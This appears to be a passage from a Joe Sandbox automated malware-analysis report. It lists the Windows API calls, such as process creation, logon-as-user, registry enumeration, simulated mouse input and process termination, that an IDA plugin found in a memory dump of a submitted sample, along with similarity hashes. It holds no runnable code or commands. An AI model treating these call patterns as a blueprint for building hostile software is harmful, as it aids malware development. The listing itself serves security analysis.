                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 004B7632
                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 004B763F
                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004B764A
                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 004B7659
                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 004B7665
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                              • String ID: Msctls_Progress32
                                                              • API String ID: 1025951953-3636473452
                                                              • Opcode ID: 7abca5646e21d3d0bdb54e74ac3324f859f89ebb22138531cb11af15f6914884
                                                              • Instruction ID: b3c9ed4db48d3dd1c6d2e27c67db438fde2f00afaa2f169563c5e8bcbf0f846d
                                                              • Opcode Fuzzy Hash: 7abca5646e21d3d0bdb54e74ac3324f859f89ebb22138531cb11af15f6914884
                                                              • Instruction Fuzzy Hash: 8811E6B1110119BFEF118F65CC85EE77F5DEF083A8F014115BB04A20A0CA76AC21DBA8
                                                              APIs
                                                              • __init_pointers.LIBCMT ref: 00459AE6
                                                                • Part of subcall function 00453187: EncodePointer.KERNEL32(00000000), ref: 0045318A
                                                                • Part of subcall function 00453187: __initp_misc_winsig.LIBCMT ref: 004531A5
                                                                • Part of subcall function 00453187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00459EA0
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00459EB4
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00459EC7
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00459EDA
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00459EED
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00459F00
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00459F13
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00459F26
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00459F39
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00459F4C
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00459F5F
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00459F72
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00459F85
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00459F98
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00459FAB
                                                                • Part of subcall function 00453187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00459FBE
                                                              • __mtinitlocks.LIBCMT ref: 00459AEB
                                                              • __mtterm.LIBCMT ref: 00459AF4
                                                                • Part of subcall function 00459B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00459AF9,00457CD0,004EA0B8,00000014), ref: 00459C56
                                                                • Part of subcall function 00459B5C: _free.LIBCMT ref: 00459C5D
                                                                • Part of subcall function 00459B5C: DeleteCriticalSection.KERNEL32(02O,?,?,00459AF9,00457CD0,004EA0B8,00000014), ref: 00459C7F
                                                              • __calloc_crt.LIBCMT ref: 00459B19
                                                              • __initptd.LIBCMT ref: 00459B3B
                                                              • GetCurrentThreadId.KERNEL32 ref: 00459B42
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                              • String ID:
                                                              • API String ID: 3567560977-0
                                                              • Opcode ID: 46dbff05e0bcdf8e580b5fcd30c8b4e07bad482868155a39d0428612696fdd47
                                                              • Instruction ID: 2ae62426222ec65429b25f5d532d94faf8bb2169e9bb1a34f65c9db9f5bb1b28
                                                              • Opcode Fuzzy Hash: 46dbff05e0bcdf8e580b5fcd30c8b4e07bad482868155a39d0428612696fdd47
                                                              • Instruction Fuzzy Hash: CCF06232519751DAE6647A7A7C0364B2694EB0273BB200A2FFC54D51D3FE289C49416C
                                                              APIs
                                                              • _memset.LIBCMT ref: 004BB644
                                                              • _memset.LIBCMT ref: 004BB653
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004F6F20,004F6F64), ref: 004BB682
                                                              • CloseHandle.KERNEL32 ref: 004BB694
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memset$CloseCreateHandleProcess
                                                              • String ID: oO$doO
                                                              • API String ID: 3277943733-358147081
                                                              • Opcode ID: caa6b3b7ba6cf95354d21574fa8557027304edfd260bc5d0822475e7a40fe185
                                                              • Instruction ID: 895301e791b60ac6666730454d65729b4e9b20d7c4ee91ab41d7549f14aa65e3
                                                              • Opcode Fuzzy Hash: caa6b3b7ba6cf95354d21574fa8557027304edfd260bc5d0822475e7a40fe185
                                                              • Instruction Fuzzy Hash: 6DF0FEB25403047BE2106765BC06FBB7A9CEB09795F054036BE08E5192D7BA5C24C7BD
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00453F85), ref: 00454085
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0045408C
                                                              • EncodePointer.KERNEL32(00000000), ref: 00454097
                                                              • DecodePointer.KERNEL32(00453F85), ref: 004540B2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                              • String ID: RoUninitialize$combase.dll
                                                              • API String ID: 3489934621-2819208100
                                                              • Opcode ID: 921470834120af926f4f7cbe216860375019214c46f213a24dcfec1a95eabfb3
                                                              • Instruction ID: 300108b336663d03eca51e1c98ce954b715ecd23b8c77600d3d3accb955de76a
                                                              • Opcode Fuzzy Hash: 921470834120af926f4f7cbe216860375019214c46f213a24dcfec1a95eabfb3
                                                              • Instruction Fuzzy Hash: E0E01A70540200ABDA509F61EE08B153AA4B710743F200139F505D51A0CFBA5698CA0C
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memmove$__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 3253778849-0
                                                              • Opcode ID: 3f03857a6e89d49d2b23adb80710b0c1c05ec5fd0e72f6afcc0fdb021d4ac1ae
                                                              • Instruction ID: 111daa243ca0d0f5473fc5fea8a330716a6465144956d8a81d34878b5c90ba2f
                                                              • Opcode Fuzzy Hash: 3f03857a6e89d49d2b23adb80710b0c1c05ec5fd0e72f6afcc0fdb021d4ac1ae
                                                              • Instruction Fuzzy Hash: 0E619E3050024A9BCF16EF65CC82EFE3BA5AF49308F05452EFC555B292DB789C06CB58
                                                              APIs
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                                • Part of subcall function 004B0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004AFDAD,?,?), ref: 004B0E31
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004B02BD
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004B02FD
                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 004B0320
                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 004B0349
                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 004B038C
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004B0399
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                              • String ID:
                                                              • API String ID: 4046560759-0
                                                              • Opcode ID: 26a42224667bd3a5371d17698e45ecfe497825a01be491e3b2f62b2535d50af5
                                                              • Instruction ID: db81573fb31feb67f07116270f183e11e77e1861341c732e77d299452fa090bb
                                                              • Opcode Fuzzy Hash: 26a42224667bd3a5371d17698e45ecfe497825a01be491e3b2f62b2535d50af5
                                                              • Instruction Fuzzy Hash: 4E514E71108204AFD714EF65C885EAFBBE5FF88314F04491EF855872A2DB39D909CB56
                                                              APIs
                                                              • GetMenu.USER32(?), ref: 004B57FB
                                                              • GetMenuItemCount.USER32(00000000), ref: 004B5832
                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004B585A
                                                              • GetMenuItemID.USER32(?,?), ref: 004B58C9
                                                              • GetSubMenu.USER32(?,?), ref: 004B58D7
                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 004B5928
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountMessagePostString
                                                              • String ID:
                                                              • API String ID: 650687236-0
                                                              • Opcode ID: 1c3628315c99fedc3912471252a1c914bb6c13ff3362fd0420894b84e39a866e
                                                              • Instruction ID: 671b33b8e6195a396f5e1669aecaca47a1247113efad201ff336146c764adf39
                                                              • Opcode Fuzzy Hash: 1c3628315c99fedc3912471252a1c914bb6c13ff3362fd0420894b84e39a866e
                                                              • Instruction Fuzzy Hash: 5B517E35E00615EFCF15EF65C845AEEBBB4EF48314F10446AE905BB351CB78AE418BA8
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 0048EF06
                                                              • VariantClear.OLEAUT32(00000013), ref: 0048EF78
                                                              • VariantClear.OLEAUT32(00000000), ref: 0048EFD3
                                                              • _memmove.LIBCMT ref: 0048EFFD
                                                              • VariantClear.OLEAUT32(?), ref: 0048F04A
                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0048F078
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                                              • String ID:
                                                              • API String ID: 1101466143-0
                                                              • Opcode ID: 05f4e366557a9f9b24a93ab77b684039115a079cc914a439c9ae10c89ccbdcf0
                                                              • Instruction ID: e95e931b27b41293def412a92d9a6d6bb4af60250d770f19d15f6c9613f102ef
                                                              • Opcode Fuzzy Hash: 05f4e366557a9f9b24a93ab77b684039115a079cc914a439c9ae10c89ccbdcf0
                                                              • Instruction Fuzzy Hash: 84516AB5A00209EFCB14DF58C880AAAB7B8FF4D314B15856AED59DB301E334E915CFA4
                                                              APIs
                                                              • _memset.LIBCMT ref: 00492258
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004922A3
                                                              • IsMenu.USER32(00000000), ref: 004922C3
                                                              • CreatePopupMenu.USER32 ref: 004922F7
                                                              • GetMenuItemCount.USER32(000000FF), ref: 00492355
                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00492386
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                              • String ID:
                                                              • API String ID: 3311875123-0
                                                              • Opcode ID: 26b0cf545d795cd13ab820f5a09f0df121587530da6eb80dd04b3d68a162bff2
                                                              • Instruction ID: ee41d9ad57ac48b1e9df1c5bb13c2861669730fadf18551cfb004bc432e802f1
                                                              • Opcode Fuzzy Hash: 26b0cf545d795cd13ab820f5a09f0df121587530da6eb80dd04b3d68a162bff2
                                                              • Instruction Fuzzy Hash: 8E51AE30600209FBDF31CF68DA88BAEBFF5AF45318F10427AE815A7291D3B89905CB55
                                                              APIs
                                                                • Part of subcall function 00432612: GetWindowLongW.USER32(?,000000EB), ref: 00432623
                                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 0043179A
                                                              • GetWindowRect.USER32(?,?), ref: 004317FE
                                                              • ScreenToClient.USER32(?,?), ref: 0043181B
                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0043182C
                                                              • EndPaint.USER32(?,?), ref: 00431876
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                              • String ID:
                                                              • API String ID: 1827037458-0
                                                              • Opcode ID: 6d1e3d1f42b9bb7db9fc320a8b5e610491435315b8af1d67fffe173b3efbae59
                                                              • Instruction ID: d76a123bc0ff705356395e19a82b790cf03d34efff92c8cb0dae4b24016db21c
                                                              • Opcode Fuzzy Hash: 6d1e3d1f42b9bb7db9fc320a8b5e610491435315b8af1d67fffe173b3efbae59
                                                              • Instruction Fuzzy Hash: FB419F31504700AFD710EF25CC84FBA7BE8EB49764F04462AFAA4872B1D7349C56DB6A
                                                              APIs
                                                              • ShowWindow.USER32(004F57B0,00000000,01225850,?,?,004F57B0,?,004BB5A8,?,?), ref: 004BB712
                                                              • EnableWindow.USER32(00000000,00000000), ref: 004BB736
                                                              • ShowWindow.USER32(004F57B0,00000000,01225850,?,?,004F57B0,?,004BB5A8,?,?), ref: 004BB796
                                                              • ShowWindow.USER32(00000000,00000004,?,004BB5A8,?,?), ref: 004BB7A8
                                                              • EnableWindow.USER32(00000000,00000001), ref: 004BB7CC
                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004BB7EF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$Enable$MessageSend
                                                              • String ID:
                                                              • API String ID: 642888154-0
                                                              • Opcode ID: 72598b521a4069b705420464f7d4a44dc08f800f84b16d58a90b58e5738ae059
                                                              • Instruction ID: cb04806912d3d1b2bdc53491c2562db8b199a207f84a7f934c40bfbf38c4d2a7
                                                              • Opcode Fuzzy Hash: 72598b521a4069b705420464f7d4a44dc08f800f84b16d58a90b58e5738ae059
                                                              • Instruction Fuzzy Hash: 04419534600240AFDB21CF24C899BD57BE0FF45310F1841BAF9488F7A2CBB5A856CBA4
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,004A4E41,?,?,00000000,00000001), ref: 004A70AC
  • Part of subcall function 004A39A0: GetWindowRect.USER32(?,?), ref: 004A39B3
• GetDesktopWindow.USER32 ref: 004A70D6
• GetWindowRect.USER32(00000000), ref: 004A70DD
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 004A710F
  • Part of subcall function 00495244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004952BC
• GetCursorPos.USER32(?), ref: 004A713B
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 004A7199
Memory Dump Source
• Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• String ID:
• API String ID: 4137160315-0
• Opcode ID: f494605da67b4f177d9c3a6bdf6cec008a6ac47eb2f79a0045fabd36b50af478
• Instruction ID: dcf879b53f4d9db5118dba940de2dd81f45a140805f80f97e2d81cdb4866359e
• Opcode Fuzzy Hash: f494605da67b4f177d9c3a6bdf6cec008a6ac47eb2f79a0045fabd36b50af478
• Instruction Fuzzy Hash: AC31B472505305ABD720DF14CC49B9BBBE9FF99314F00062AF58997291C674EA09CBDA
APIs
  • Part of subcall function 004880A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004880C0
  • Part of subcall function 004880A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004880CA
  • Part of subcall function 004880A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004880D9
  • Part of subcall function 004880A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004880E0
  • Part of subcall function 004880A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004880F6
• GetLengthSid.ADVAPI32(?,00000000,0048842F), ref: 004888CA
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 004888D6
• HeapAlloc.KERNEL32(00000000), ref: 004888DD
• CopySid.ADVAPI32(00000000,00000000,?), ref: 004888F6
• GetProcessHeap.KERNEL32(00000000,00000000,0048842F), ref: 0048890A
• HeapFree.KERNEL32(00000000), ref: 00488911
Similarity
• API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
• String ID:
• API String ID: 3008561057-0
• Opcode ID: 2093636edac730c67e3989b551c4833e91737cb5570e49b326d7d10b8be98bdf
• Instruction ID: b7870aed429b18e3c97659f3921e8038ae1b33fdd520a07bdf85e57711ccab41
• Opcode Fuzzy Hash: 2093636edac730c67e3989b551c4833e91737cb5570e49b326d7d10b8be98bdf
• Instruction Fuzzy Hash: F711D2B1501605FFDB10AF98CC09BBF7768EB41311F50492EE84993210CB3A9D04CB64
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004885E2
• OpenProcessToken.ADVAPI32(00000000), ref: 004885E9
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004885F8
• CloseHandle.KERNEL32(00000004), ref: 00488603
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00488632
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00488646
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
• Opcode ID: 90e3a2b41b51f82eb96158803deddb0af4ef7cec1aaa30e168f042bd0673d572
• Instruction ID: f6be3b756895c3f96136d05b6df6842c27106fc2bf18bcba8b573503138a0cf3
• Opcode Fuzzy Hash: 90e3a2b41b51f82eb96158803deddb0af4ef7cec1aaa30e168f042bd0673d572
• Instruction Fuzzy Hash: 0B115972500209BBDF019FA8DD49BDF7BA9EF08304F044169FE04A2161C7769D65EB64
APIs
• GetDC.USER32(00000000), ref: 0048B7B5
• GetDeviceCaps.GDI32(00000000,00000058), ref: 0048B7C6
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0048B7CD
• ReleaseDC.USER32(00000000,00000000), ref: 0048B7D5
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 0048B7EC
• MulDiv.KERNEL32(000009EC,?,?), ref: 0048B7FE
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
• Opcode ID: 9a8675147205cd7b5728f465b28f665ad1fda0e4053c88ba7487b6da5c4069a9
• Instruction ID: 3ea944893fc5a3da7d3e21af04600d63655f48df9726506d2a84d55564eb19a4
• Opcode Fuzzy Hash: 9a8675147205cd7b5728f465b28f665ad1fda0e4053c88ba7487b6da5c4069a9
• Instruction Fuzzy Hash: A2017175E00309BFEF10ABE69C45A5EBFA8EB48311F004176FE08A7291D6309C04CF94
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00450193
• MapVirtualKeyW.USER32(00000010,00000000), ref: 0045019B
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 004501A6
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 004501B1
• MapVirtualKeyW.USER32(00000011,00000000), ref: 004501B9
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004501C1
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: 1c1389f5f9a5b0afba21de7289f9ecc9f8de28485629925c7305b4d2851af865
• Instruction ID: eea781d471832368adc9d55e24dfcdc49d9a20de8dd37078c437cf24f327e788
• Opcode Fuzzy Hash: 1c1389f5f9a5b0afba21de7289f9ecc9f8de28485629925c7305b4d2851af865
• Instruction Fuzzy Hash: 2F016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A868CBE5
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004953F9
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0049540F
• GetWindowThreadProcessId.USER32(?,?), ref: 0049541E
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0049542D
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00495437
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0049543E
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
• Opcode ID: 09d62cd989ef1e7aef71939168b65707a8015b3a8773043c7687bbfc33925b7e
• Instruction ID: 4fcdf6be3c74799959579fe900c98a64c6e645956b9088b314ee1952719380ea
• Opcode Fuzzy Hash: 09d62cd989ef1e7aef71939168b65707a8015b3a8773043c7687bbfc33925b7e
